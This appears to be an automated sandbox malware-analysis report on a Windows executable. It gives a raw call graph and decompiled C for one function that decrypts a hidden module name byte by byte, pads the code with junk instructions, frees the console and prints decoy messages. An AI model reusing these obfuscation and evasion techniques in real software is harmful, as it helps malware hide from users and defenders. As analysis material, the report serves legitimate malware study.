17366->17350 17369 41e3eb 17367->17369 17368 41e40a 17368->16365 17369->17368 17375 41ea60 17369->17375 17372 41edbc 17371->17372 17373 41edc9 17372->17373 17374 41e0f0 77 API calls 17372->17374 17373->17043 17374->17373 17378 403b61 17375->17378 17381 40487c LeaveCriticalSection 17378->17381 17380 403b68 17380->17368 17381->17380 17383 418d46 17382->17383 17384 418d50 17383->17384 17385 418e78 GetModuleHandleA GetProcAddress VirtualProtect 17383->17385 17384->16952 17385->16952 17397 418840 17386->17397 17390 404970 ___crtGetEnvironmentStringsA __VEC_memcpy 17389->17390 17391 4190cd 17390->17391 17392 4190f0 17391->17392 17393 4028aa 17392->17393 17408 4010c0 17397->17408 17400 4188e3 17405 418911 17400->17405 17419 401120 17400->17419 17401 418b05 17414 401100 17401->17414 17403 401120 7 API calls 17403->17405 17405->17403 17407 41898d 17405->17407 17406 401120 7 API calls 17406->17407 17407->17401 17407->17406 17409 4010d1 std::locale::_Locimp::_Locimp 17408->17409 17423 401610 17409->17423 17411 4010d9 17427 4014e0 17411->17427 17413 4010ed 17413->17400 17461 4015a0 17414->17461 17420 40112f 17419->17420 17421 401139 17420->17421 17422 405223 ctype 7 API calls 17420->17422 17421->17400 17421->17421 17422->17421 17424 401625 _DebugHeapAllocator 17423->17424 17430 4019a0 17424->17430 17426 40162d _DebugHeapAllocator 17426->17411 17445 4018c0 17427->17445 17429 40150f 17429->17413 17431 4019b1 _DebugHeapAllocator std::locale::_Locimp::_Locimp 17430->17431 17434 401e50 17431->17434 17433 4019cd 17433->17426 17437 4022b0 17434->17437 17438 4022bc 17437->17438 17439 4022c5 17437->17439 17441 40551d std::locale::_Init 76 API calls 17438->17441 17439->17438 17440 402230 std::bad_exception::bad_exception 64 API calls 17439->17440 17442 4022dc 17440->17442 17443 401e62 17441->17443 17444 4052cb __CxxThrowException@8 RaiseException 17442->17444 17443->17433 17444->17438 17446 4018f1 17445->17446 17451 4018eb 17445->17451 17447 401905 17446->17447 17448 4018fe 17446->17448 17450 401e30 allocator 76 API calls 17447->17450 17452 401c80 17448->17452 17450->17451 17451->17429 17453 401030 std::locale::_Locimp::_Locimp 77 API calls 17452->17453 17454 401c93 17453->17454 17455 401cc0 std::bad_exception::bad_exception 77 API calls 17454->17455 17456 401c9f 17455->17456 17457 4052cb __CxxThrowException@8 RaiseException 17456->17457 17458 401cad 17457->17458 17459 401070 std::runtime_error::~runtime_error 66 API calls 17458->17459 17460 401cb5 17459->17460 17460->17451 17462 40110f 17461->17462 17463 4015b0 task 17461->17463 17465 401150 17462->17465 17464 401a50 std::locale::_Locimp::~_Locimp 65 API calls 17463->17464 17464->17462 17468 401650 17465->17468 17467 401117 17467->16954 17469 401a50 std::locale::_Locimp::~_Locimp 65 API calls 17468->17469 17470 40166a task 17469->17470 17470->17467 17496 41de00 17471->17496 17474 41fe20 17475 403a0c std::_Lockit::_Lockit EnterCriticalSection 17474->17475 17476 41fe30 17475->17476 17514 41ef40 17476->17514 17478 41fe5a 17481 403a34 std::locale::facet::_Decref LeaveCriticalSection 17478->17481 17479 41fe42 std::locale::_Getfacet 17479->17478 17520 41ffd0 17479->17520 17483 41dbd7 17481->17483 17492 41dd10 17483->17492 17484 41fe9c 17487 41de30 std::locale::facet::_Incref 2 API calls 17484->17487 17485 41fe7f 17534 405469 17485->17534 17489 41feb9 17487->17489 17537 41ef90 17489->17537 17490 4052cb __CxxThrowException@8 RaiseException 17490->17478 17493 41dd21 17492->17493 17494 41dd2b 17492->17494 17902 41dd60 17493->17902 17494->16972 17499 41de30 17496->17499 17504 403a0c 17499->17504 17505 403a2c 17504->17505 17506 403a1e 17504->17506 17508 403a34 17505->17508 17512 40486c EnterCriticalSection 17506->17512 17509 403a49 17508->17509 17510 403a3b 17508->17510 17509->17474 17513 40487c LeaveCriticalSection 17510->17513 17512->17505 17513->17509 17515 41ef51 17514->17515 17516 41ef85 17514->17516 17517 403a0c std::_Lockit::_Lockit EnterCriticalSection 17515->17517 17516->17479 17518 41ef5b 17517->17518 17519 403a34 std::locale::facet::_Decref LeaveCriticalSection 17518->17519 17519->17516 17521 41fe77 17520->17521 17522 41ffed 17520->17522 17521->17484 17521->17485 17522->17521 17523 40551d std::locale::_Init 76 API calls 17522->17523 17524 420000 17523->17524 17525 42003d 17524->17525 17540 41f1c0 17524->17540 17527 420074 17525->17527 17560 41f170 17525->17560 17527->17521 17531 401070 std::runtime_error::~runtime_error 66 API calls 17527->17531 17531->17521 17535 405379 std::exception::exception 64 API calls 17534->17535 17536 40547a 17535->17536 17536->17490 17827 403cd1 17537->17827 17541 401330 std::bad_exception::bad_exception 77 API calls 17540->17541 17542 41f1d8 17541->17542 17543 41f110 17542->17543 17544 403a0c std::_Lockit::_Lockit EnterCriticalSection 17543->17544 17545 41f121 17544->17545 17546 401000 codecvt 66 API calls 17545->17546 17547 41f12c 17546->17547 17548 401000 codecvt 66 API calls 17547->17548 17549 41f137 17548->17549 17550 401000 codecvt 66 API calls 17549->17550 17551 41f142 17550->17551 17552 401000 codecvt 66 API calls 17551->17552 17553 41f14d 17552->17553 17573 403e78 17553->17573 17823 403d0f 17560->17823 17563 401070 std::runtime_error::~runtime_error 66 API calls 17564 41f18e 17563->17564 17565 401070 std::runtime_error::~runtime_error 66 API calls 17564->17565 17566 41f199 17565->17566 17567 401070 std::runtime_error::~runtime_error 66 API calls 17566->17567 17568 41f1a4 17567->17568 17569 401070 std::runtime_error::~runtime_error 66 API calls 17568->17569 17570 41f1af 17569->17570 17571 403a34 std::locale::facet::_Decref LeaveCriticalSection 17570->17571 17572 41f1b7 17571->17572 17572->17527 17824 403d33 17823->17824 17825 403d1d 17823->17825 17824->17563 17826 409c4d _setlocale 116 API calls 17825->17826 17826->17824 17828 403cdf 17827->17828 17831 403ce9 17827->17831 17833 403b6f 17828->17833 17830 40551d std::locale::_Init 76 API calls 17832 403cf1 17830->17832 17831->17830 17832->17478 17834 407d9d _AtModuleExit 75 API calls 17833->17834 17836 403b7c 17834->17836 17835 403b87 17835->17831 17836->17835 17837 408c5b 17836->17837 17838 40de0d __NMSG_WRITE 64 API calls 17836->17838 17847 40ff3f 17837->17847 17838->17837 17841 408d44 17871 40dd8b 17841->17871 17842 408c6c _memset 17842->17841 17845 408d04 SetUnhandledExceptionFilter UnhandledExceptionFilter 17842->17845 17845->17841 17848 40bc23 __decode_pointer 7 API calls 17847->17848 17849 408c61 17848->17849 17849->17842 17850 40ff4c 17849->17850 17853 40ff58 _fgetc 17850->17853 17851 40ffb4 17852 40ff95 17851->17852 17856 40ffc3 17851->17856 17853->17851 17853->17852 17854 40ff7f 17853->17854 17860 40ff7b 17853->17860 17860->17854 17860->17856 17879 40dc49 17871->17879 17903 403a0c std::_Lockit::_Lockit EnterCriticalSection 17902->17903 17904 41dd73 17903->17904 17905 403a34 std::locale::facet::_Decref LeaveCriticalSection 17904->17905 17906 41ddae 17905->17906 17906->17494 17908 41e940 EnterCriticalSection 17907->17908 17909 41e3a3 17908->17909 17933 41e650 17909->17933 17913 403a0c std::_Lockit::_Lockit EnterCriticalSection 17912->17913 17914 41ee90 17913->17914 17915 41ef40 int 2 API calls 17914->17915 17916 41eea2 std::locale::_Getfacet 17915->17916 17929 41eeba 17916->17929 17947 41f040 17916->17947 17918 403a34 std::locale::facet::_Decref LeaveCriticalSection 17919 41ef2f 17918->17919 17919->16982 17921 41eefc 17924 41de30 std::locale::facet::_Incref 2 API calls 17921->17924 17922 41eedf 17923 405469 std::bad_exception::bad_exception 64 API calls 17922->17923 17925 41eeec 17923->17925 17926 41ef19 17924->17926 17927 4052cb __CxxThrowException@8 RaiseException 17925->17927 17928 41ef90 78 API calls 17926->17928 17927->17929 17928->17929 17929->17918 17931 41e3d0 LeaveCriticalSection 17930->17931 17932 41d55b 17931->17932 17932->16386 17936 41e687 17933->17936 17934 41e1a0 77 API calls 17935 41e3b2 17934->17935 17935->16975 17937 41e0f0 77 API calls 17936->17937 17938 41e6bf 17936->17938 17946 41e782 17936->17946 17937->17938 17939 41dde0 2 API calls 17938->17939 17938->17946 17940 41e6f8 17939->17940 17941 41ee80 132 API calls 17940->17941 17942 41e6fe 17941->17942 17943 41dd10 ctype 2 API calls 17942->17943 17944 41e70c ctype 17943->17944 17945 41e1a0 77 API calls 17944->17945 17944->17946 17945->17946 17946->17934 17946->17935 17948 41eed7 17947->17948 17949 41f05d 17947->17949 17948->17921 17948->17922 17949->17948 17950 40551d std::locale::_Init 76 API calls 17949->17950 17951 41f070 17950->17951 17952 41f1c0 codecvt 77 API calls 17951->17952 17960 41f0ad 17951->17960 17953 41f08d 17952->17953 17954 41f170 codecvt 118 API calls 17955 41f0e4 17954->17955 17955->17948 17960->17954 17960->17955 18385 407e6b 18392 4076d6 18385->18392 18388 407e7e 18390 4055ff __crtGetStringTypeA_stat 64 API calls 18388->18390 18391 407e89 18390->18391 18405 4075a9 18392->18405 18394 4076dd 18394->18388 18395 40fe39 18394->18395 18396 40fe45 _fgetc 18395->18396 18397 40c69c __lock 64 API calls 18396->18397 18400 40fe51 18397->18400 18398 40feba 18446 40fecf 18398->18446 18400->18398 18403 40fe8f DeleteCriticalSection 18400->18403 18433 407bfa 18400->18433 18401 40fec6 _fgetc 18401->18388 18404 4055ff __crtGetStringTypeA_stat 64 API calls 18403->18404 18404->18400 18406 4075b5 _fgetc 18405->18406 18407 40c69c __lock 64 API calls 18406->18407 18413 4075c4 18407->18413 18408 40765c 18423 40767a 18408->18423 18411 407668 _fgetc 18411->18394 18413->18408 18414 407561 102 API calls __fflush_nolock 18413->18414 18415 407ecc 18413->18415 18420 40764b 18413->18420 18414->18413 18416 407ed9 18415->18416 18417 407eef EnterCriticalSection 18415->18417 18418 40c69c __lock 64 API calls 18416->18418 18417->18413 18419 407ee2 18418->18419 18419->18413 18426 407f3a 18420->18426 18422 407659 18422->18413 18432 40c5c2 LeaveCriticalSection 18423->18432 18425 407681 18425->18411 18427 407f4a 18426->18427 18428 407f5d LeaveCriticalSection 18426->18428 18431 40c5c2 LeaveCriticalSection 18427->18431 18428->18422 18430 407f5a 18430->18422 18431->18430 18432->18425 18434 407c06 _fgetc 18433->18434 18435 407c37 18434->18435 18436 407c1a 18434->18436 18438 407e8b __lock_file 65 API calls 18435->18438 18442 407c2f _fgetc 18435->18442 18437 40a982 __fclose_nolock 64 API calls 18436->18437 18439 407c1f 18437->18439 18440 407c4f 18438->18440 18441 4051fd __fclose_nolock 7 API calls 18439->18441 18449 407b83 18440->18449 18441->18442 18442->18400 18523 40c5c2 LeaveCriticalSection 18446->18523 18448 40fed6 18448->18401 18450 407bb3 18449->18450 18451 407b97 18449->18451 18453 407bac 18450->18453 18454 4074f9 __flush 98 API calls 18450->18454 18452 40a982 __fclose_nolock 64 API calls 18451->18452 18455 407b9c 18452->18455 18465 407c6e 18453->18465 18456 407bbf 18454->18456 18457 4051fd __fclose_nolock 7 API calls 18455->18457 18468 40f48d 18456->18468 18457->18453 18460 40eb22 __fileno 64 API calls 18461 407bcd 18460->18461 18472 40fcc9 18461->18472 18463 407bd3 18463->18453 18464 4055ff __crtGetStringTypeA_stat 64 API calls 18463->18464 18464->18453 18466 407efe _ungetc 2 API calls 18465->18466 18467 407c74 18466->18467 18467->18442 18469 407bc7 18468->18469 18470 40f49d 18468->18470 18469->18460 18470->18469 18471 4055ff __crtGetStringTypeA_stat 64 API calls 18470->18471 18471->18469 18473 40fcd5 _fgetc 18472->18473 18474 40fcf8 18473->18474 18475 40fcdd 18473->18475 18476 40fd06 18474->18476 18481 40fd47 18474->18481 18477 40a995 __read_nolock 64 API calls 18475->18477 18478 40a995 __read_nolock 64 API calls 18476->18478 18479 40fce2 18477->18479 18480 40fd0b 18478->18480 18482 40a982 __fclose_nolock 64 API calls 18479->18482 18484 40a982 __fclose_nolock 64 API calls 18480->18484 18485 414e08 ___lock_fhandle 65 API calls 18481->18485 18483 40fcea _fgetc 18482->18483 18483->18463 18486 40fd12 18484->18486 18487 40fd4d 18485->18487 18488 4051fd __fclose_nolock 7 API calls 18486->18488 18489 40fd68 18487->18489 18490 40fd5a 18487->18490 18488->18483 18492 40a982 __fclose_nolock 64 API calls 18489->18492 18495 40fc2d 18490->18495 18493 40fd62 18492->18493 18510 40fd8c 18493->18510 18496 414d91 __lseek_nolock 64 API calls 18495->18496 18499 40fc3d 18496->18499 18497 40fc93 18513 414d0b 18497->18513 18499->18497 18502 414d91 __lseek_nolock 64 API calls 18499->18502 18509 40fc71 18499->18509 18500 414d91 __lseek_nolock 64 API calls 18503 40fc7d CloseHandle 18500->18503 18504 40fc68 18502->18504 18503->18497 18505 40fc89 GetLastError 18503->18505 18508 414d91 __lseek_nolock 64 API calls 18504->18508 18505->18497 18506 40a9a8 __dosmaperr 64 API calls 18507 40fcbd 18506->18507 18507->18493 18508->18509 18509->18497 18509->18500 18522 414ea8 LeaveCriticalSection 18510->18522 18512 40fd94 18512->18483 18514 414d77 18513->18514 18516 414d1c 18513->18516 18515 40a982 __fclose_nolock 64 API calls 18514->18515 18517 414d7c 18515->18517 18516->18514 18520 414d47 18516->18520 18518 40a995 __read_nolock 64 API calls 18517->18518 18519 40fc9b 18518->18519 18519->18506 18519->18507 18520->18519 18521 414d67 SetStdHandle 18520->18521 18521->18519 18522->18512 18523->18448 20692 405327 20697 405317 20692->20697 20695 405340 20696 4054f7 codecvt 65 API calls 20696->20695 20700 40c234 20697->20700 20699 405325 20699->20695 20699->20696 20701 40c240 _fgetc 20700->20701 20702 40c69c __lock 64 API calls 20701->20702 20703 40c247 20702->20703 20707 4055ff __crtGetStringTypeA_stat 64 API calls 20703->20707 20708 40c280 20703->20708 20709 40c277 20703->20709 20705 40c291 _fgetc 20705->20699 20706 4055ff __crtGetStringTypeA_stat 64 API calls 20706->20708 20707->20709 20710 40c29b 20708->20710 20709->20706 20713 40c5c2 LeaveCriticalSection 20710->20713 20712 40c2a2 20712->20705 20713->20712 20879 41c7c3 20880 41c7d2 20879->20880 20881 41c7e2 20880->20881 20882 418cf0 3 API calls 20880->20882 20883 41c9da 20882->20883 20884 418b20 77 API calls 20883->20884 20885 41ca8a 20884->20885 20886 41ccf2 20885->20886 20887 419020 __VEC_memcpy 20885->20887 20888 41cee1 20887->20888 20889 4190f0 2 API calls 20888->20889 20890 41ceea ctype 20889->20890 19155 41ccd6 19156 41cce5 19155->19156 19157 41ccf2 19156->19157 19158 419020 __VEC_memcpy 19156->19158 19159 41cee1 19158->19159 19160 4190f0 2 API calls 19159->19160 19161 41ceea ctype 19160->19161 19390 40be89 19391 40be95 _fgetc 19390->19391 19392 40bead 19391->19392 19393 40bf97 _fgetc 19391->19393 19394 4055ff __crtGetStringTypeA_stat 64 API calls 19391->19394 19395 40bebb 19392->19395 19396 4055ff __crtGetStringTypeA_stat 64 API calls 19392->19396 19394->19392 19397 40bec9 19395->19397 19399 4055ff __crtGetStringTypeA_stat 64 API calls 19395->19399 19396->19395 19398 40bed7 19397->19398 19400 4055ff __crtGetStringTypeA_stat 64 API calls 19397->19400 19401 4055ff __crtGetStringTypeA_stat 64 API calls 19398->19401 19403 40bee5 19398->19403 19399->19397 19400->19398 19401->19403 19402 40bef3 19405 40bf01 19402->19405 19407 4055ff __crtGetStringTypeA_stat 64 API calls 19402->19407 19403->19402 19404 4055ff __crtGetStringTypeA_stat 64 API calls 19403->19404 19404->19402 19406 40bf12 19405->19406 19408 4055ff __crtGetStringTypeA_stat 64 API calls 19405->19408 19409 40c69c __lock 64 API calls 19406->19409 19407->19405 19408->19406 19410 40bf1a 19409->19410 19411 40bf3f 19410->19411 19412 40bf26 InterlockedDecrement 19410->19412 19426 40bfa3 19411->19426 19412->19411 19413 40bf31 19412->19413 19413->19411 19417 4055ff __crtGetStringTypeA_stat 64 API calls 19413->19417 19416 40c69c __lock 64 API calls 19418 40bf53 19416->19418 19417->19411 19419 40bf84 19418->19419 19420 408f24 ___removelocaleref 8 API calls 19418->19420 19429 40bfaf 19419->19429 19424 40bf68 19420->19424 19423 4055ff __crtGetStringTypeA_stat 64 API calls 19423->19393 19424->19419 19425 408d4c _setlocale 64 API calls 19424->19425 19425->19419 19432 40c5c2 LeaveCriticalSection 19426->19432 19428 40bf4c 19428->19416 19433 40c5c2 LeaveCriticalSection 19429->19433 19431 40bf91 19431->19423 19432->19428 19433->19431 19434 40488c 19435 404896 InterlockedExchange 19434->19435 19436 4048a5 19435->19436 19436->19435 19438 4048c8 19436->19438 19439 4055ff __crtGetStringTypeA_stat 64 API calls 19436->19439 19440 4090ea 19436->19440 19439->19436 19441 4090f6 _fgetc 19440->19441 19442 40c69c __lock 64 API calls 19441->19442 19443 40918d _fgetc 19441->19443 19444 409108 19442->19444 19443->19436 19445 40912f 19444->19445 19446 409114 InterlockedDecrement 19444->19446 19460 409197 19445->19460 19446->19445 19447 40911f 19446->19447 19447->19445 19451 4055ff __crtGetStringTypeA_stat 64 API calls 19447->19451 19450 40917d 19453 4055ff __crtGetStringTypeA_stat 64 API calls 19450->19453 19451->19445 19452 40c69c __lock 64 API calls 19454 409148 19452->19454 19453->19443 19455 408f24 ___removelocaleref 8 API calls 19454->19455 19458 409157 19455->19458 19456 409170 19463 4091a3 19456->19463 19458->19456 19459 408d4c _setlocale 64 API calls 19458->19459 19459->19456 19466 40c5c2 LeaveCriticalSection 19460->19466 19462 40913c 19462->19450 19462->19452 19467 40c5c2 LeaveCriticalSection 19463->19467 19465 4091aa 19465->19450 19466->19462 19467->19465

                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                              Function 0041CFC0 Relevance: 63.6, APIs: 4, Strings: 32, Instructions: 628libraryloaderCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 28 41cfc0-41d0af 30 41d2e3-41d2f4 GetModuleHandleA 28->30 31 41d0b5-41d2de 28->31 32 41d364-41d412 call 41d990 call 4191f0 30->32 33 41d2f6-41d312 GetProcAddress 30->33 47 41d434-41d44d call 41f6a0 call 41db50 32->47 48 41d414-41d432 call 41f6a0 call 41db50 32->48 34 41d314-41d335 FreeConsole call 41f6a0 33->34 35 41d346-41d35f call 41f6a0 call 41db50 33->35 40 41d33a-41d344 call 41db50 34->40 35->32 40->32 56 41d452-41d45c 47->56 48->56 57 41d46d-41d474 56->57 58 41d4a4-41d4db 57->58 59 41d476-41d4a2 call 41f6a0 call 41db70 call 41db50 57->59 60 41d4ec-41d4f3 58->60 59->57 62 41d4f5-41d508 60->62 63 41d50a-41d556 call 41f6a0 call 41db70 call 41db50 call 401000 call 41f6a0 call 41f950 60->63 62->60 82 41d55b-41d5c0 call 41f6a0 call 41fb80 call 41f6a0 call 41db50 call 41f6a0 call 41e1f0 63->82 95 41d5c2-41d5c6 82->95 96 41d5c7-41d5c9 82->96 95->96 97 41d5f5-41d618 call 41db70 call 41f6a0 call 41db50 96->97 98 41d5cb-41d5f3 call 41db70 call 41f6a0 call 41db50 96->98 110 41d61d 97->110 98->110 111 41d624-41d628 110->111 112 41d62a-41d65c call 41f6a0 call 41db70 call 41db50 111->112 113 41d65e-41d6af call 41f6a0 call 41db70 call 41db50 111->113 112->111 126 41d6c0-41d6c9 113->126 127 41d6cb-41d6d7 126->127 128 41d73f-41d749 126->128 129 41d6d9-41d6dd 127->129 130 41d6de-41d6e0 127->130 131 41d76b-41d784 call 41f6a0 call 41db50 128->131 132 41d74b-41d769 call 41f6a0 call 41db50 128->132 129->130 133 41d6e2-41d70d call 41db70 call 41f6a0 call 41db50 130->133 134 41d70f-41d735 call 41db70 call 41f6a0 call 41db50 130->134 147 41d789-41d7c9 call 41f6a0 call 41de70 call 41db50 131->147 132->147 155 41d73a 133->155 134->155 162 41d7eb-41d7ef 147->162 163 41d7cb-41d7e9 call 41f6a0 call 41db50 147->163 155->126 165 41d811-41d82a call 41f6a0 call 41db50 162->165 166 41d7f1-41d80f call 41f6a0 call 41db50 162->166 176 41d82f-41d84e 163->176 165->176 166->176 178 41d85f-41d866 176->178 179 41d8b6-41d967 GetEnvironmentStringsW call 401070 178->179 180 41d868-41d8b4 call 41f6a0 call 41db70 call 41f6a0 call 41db70 call 41db50 178->180 180->178
                                                                                                                                                                                              C-Code - Quality: 77%
                                                                                                                                                                                              			E0041CFC0(void* __eax, void* __edx) {
				signed int _v8;
				char _v9;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed int _v32;
				char _v36;
				char _v37;
				char _v38;
				char _v39;
				char _v40;
				char _v41;
				char _v42;
				char _v43;
				char _v44;
				char _v45;
				char _v46;
				char _v47;
				char _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				char _v92;
				intOrPtr _v96;
				signed int _v100;
				struct HINSTANCE__* _v104;
				signed int _v105;
				intOrPtr _v112;
				signed int _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				signed int _v136;
				signed int _v140;
				signed int _v141;
				_Unknown_base(*)()* _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				intOrPtr _v172;
				signed int _t248;
				signed int _t262;
				void* _t280;
				void* _t284;
				void* _t288;
				void* _t290;
				void* _t293;
				void* _t312;
				void* _t315;
				void* _t317;
				void* _t319;
				void* _t323;
				void* _t326;
				void* _t328;
				void* _t332;
				signed int _t335;
				void* _t336;
				signed int _t339;
				void* _t342;
				void* _t345;
				signed int _t400;
				signed int _t419;
				signed int _t539;
				signed int _t544;
				void* _t555;
				signed int _t561;
				void* _t574;
				void* _t575;
				void* _t576;
				void* _t583;
				void* _t584;
				void* _t585;
				intOrPtr* _t586;
				void* _t587;
				void* _t588;

				asm("ror edx, 0x86");
				asm("sbb edi, 0x6");
				asm("bswap ebx");
				asm("bswap esi");
				asm("sbb esi, 0x8");
				asm("rcr esi, 0x42");
				asm("rol eax, 0x5d");
				asm("rcr edx, 1");
				asm("rol eax, 0x78");
				asm("ror ebx, 0x59");
				asm("rcl ebx, 0x30");
				_t544 = (_t539 | 0xff) - 0xe0 + 1 - 1;
				asm("rol eax, 0x49");
				asm("bswap esi");
				asm("rol eax, 0x79");
				asm("rcr esi, 0x34");
				_t561 =  ~((_t555 - 0x00000058 | 0x00000035) + 1) - 0x00000001 & 0x000000c1;
				asm("rcl esi, 0x5d");
				_v48 = 7;
				_v47 = 0x67;
				_v46 = 0x31;
				_v45 = 0x62;
				_v44 = 0xfb;
				_v43 = 0x14;
				_v42 = 0xee;
				_v41 = 0x28;
				_v40 = 0x7a;
				_v39 = 0xf9;
				_v38 = 0xea;
				_v37 = 0x1c;
				_v36 = 0xa7;
				_v140 = 0;
				while(_v140 < 0xd) {
					_v141 =  *((intOrPtr*)(_t574 + _v140 - 0x2c));
					_v141 = (_v141 & 0x000000ff) >> 0x00000006 | (_v141 & 0x000000ff) << 0x00000002;
					_v141 =  ~(_v141 & 0x000000ff);
					_v141 = (_v141 & 0x000000ff) >> 0x00000002 | (_v141 & 0x000000ff) << 0x00000006;
					_v141 =  !(_v141 & 0x000000ff);
					_v141 = (_v141 & 0x000000ff) >> 0x00000005 | (_v141 & 0x000000ff) << 0x00000003;
					_v141 = (_v141 & 0x000000ff) - _v140;
					_v141 =  !(_v141 & 0x000000ff);
					_v141 = (_v141 & 0x000000ff) + 0x8f;
					_v141 = (_v141 & 0x000000ff) >> 0x00000003 | (_v141 & 0x000000ff) << 0x00000005;
					_v141 = (_v141 & 0x000000ff) + 0x23;
					_v141 = (_v141 & 0x000000ff) >> 0x00000005 | (_v141 & 0x000000ff) << 0x00000003;
					_v141 = (_v141 & 0x000000ff) + 0x82;
					_v141 =  ~(_v141 & 0x000000ff);
					_v141 = (_v141 & 0x000000ff) >> 0x00000003 | (_v141 & 0x000000ff) << 0x00000005;
					_v141 = (_v141 & 0x000000ff) - _v140;
					_v141 = (_v141 & 0x000000ff) >> 0x00000001 | (_v141 & 0x000000ff) << 0x00000007;
					_v141 =  !(_v141 & 0x000000ff);
					_v141 = (_v141 & 0x000000ff) + 0xe8;
					_v141 = (_v141 & 0x000000ff) >> 0x00000007 | (_v141 & 0x000000ff) << 0x00000001;
					_v141 = (_v141 & 0x000000ff) - 0xd3;
					_v141 = (_v141 & 0x000000ff) >> 0x00000003 | (_v141 & 0x000000ff) << 0x00000005;
					_v141 = (_v141 & 0x000000ff) + _v140;
					_v141 =  ~(_v141 & 0x000000ff);
					_v141 = (_v141 & 0x000000ff) - _v140;
					_v141 =  ~(_v141 & 0x000000ff);
					 *((char*)(_t574 + _v140 - 0x2c)) = _v141;
					_v140 = _v140 + 1;
				}
				_v104 = GetModuleHandleA( &_v48);
				__eflags = _v104;
				if(_v104 != 0) {
					_t436 = _v104;
					_v148 = GetProcAddress(_v104, "FreeConsole");
					__eflags = _v148;
					if(_v148 == 0) {
						_t342 = E0041F6A0(_t436, 0x455c48, "Failed to retrieve function address.");
						_t575 = _t575 + 8;
						E0041DB50(_t342, E0041D970);
					} else {
						_v152 = _v148;
						FreeConsole();
						_t345 = E0041F6A0(_t436, "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>", "Console freed."); // executed
						_t575 = _t575 + 8;
						E0041DB50(_t345, E0041D970);
					}
				}
				_t248 = E0041D990( &_v9);
				asm("ror edx, 0x86");
				asm("sbb edi, 0x6");
				asm("bswap ebx");
				asm("bswap esi");
				asm("sbb esi, 0x8");
				asm("rcr esi, 0x42");
				asm("rol eax, 0x5d");
				asm("rcr edx, 1");
				asm("rol eax, 0x78");
				asm("ror ebx, 0x59");
				asm("rcl ebx, 0x30");
				asm("rol eax, 0x49");
				asm("bswap esi");
				asm("rol eax, 0x79");
				asm("rcr esi, 0x34");
				asm("rcl esi, 0x5d"); // executed
				E004191F0(0xf4, ( ~((_t248 * _t561 * 0xbadc8e * (_t248 * _t561 * 0xbadc8e >> 0x00000020) + 0x00000001 - 0x00000027) * (_t248 * _t561 * 0xbadc8e * (_t248 * _t561 * 0xbadc8e >> 0x00000020) + 0x00000001 - 0x00000027) & 0x000000d6) * ((_t544 | 0xff) - 0xe0 + 1 - 1) >> 0x20) - 0x2f); // executed
				_v24 = 0;
				_v20 = 0;
				__eflags = _v24 - _v20;
				if(_v24 != _v20) {
					_t262 = E0041F6A0( &_v9, "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>", "x is not equal to y!");
					_t576 = _t575 + 8;
					_t392 = _t262;
					E0041DB50(_t262, E0041D970);
				} else {
					_t339 = E0041F6A0( &_v9, "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>", "x is equal to y!");
					_t576 = _t575 + 8;
					_t392 = _t339;
					E0041DB50(_t339, E0041D970);
				}
				_v156 = 0;
				while(1) {
					__eflags = _v156 - 5;
					if(_v156 >= 5) {
						break;
					}
					_t336 = E0041F6A0(_t392, "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>", "i = ");
					_t576 = _t576 + 8;
					E0041DB50(E0041DB70(_t336, __eflags, _v156), E0041D970);
					_t392 = _v156 + 1;
					__eflags = _t392;
					_v156 = _t392;
				}
				_v136 = 1;
				_v132 = 2;
				_v128 = 3;
				_v124 = 4;
				_v120 = 5;
				_v100 = 0;
				_v160 = 0;
				while(1) {
					__eflags = _v160 - 5;
					if(_v160 >= 5) {
						break;
					}
					_t392 = _v160;
					_v100 = _v100 +  *((intOrPtr*)(_t574 + _v160 * 4 - 0x84));
					_t335 = _v160 + 1;
					__eflags = _t335;
					_v160 = _t335;
				}
				E0041DB50(E0041DB70(E0041F6A0(_t392, "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>", "Sum of array elements: "), __eflags, _v100), E0041D970);
				E00401000( &_v92);
				E0041F6A0( &_v92, "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>", "Enter your name: ");
				E0041F950( &_v92, 0x455bb4,  &_v92); // executed
				_t492 =  &_v92;
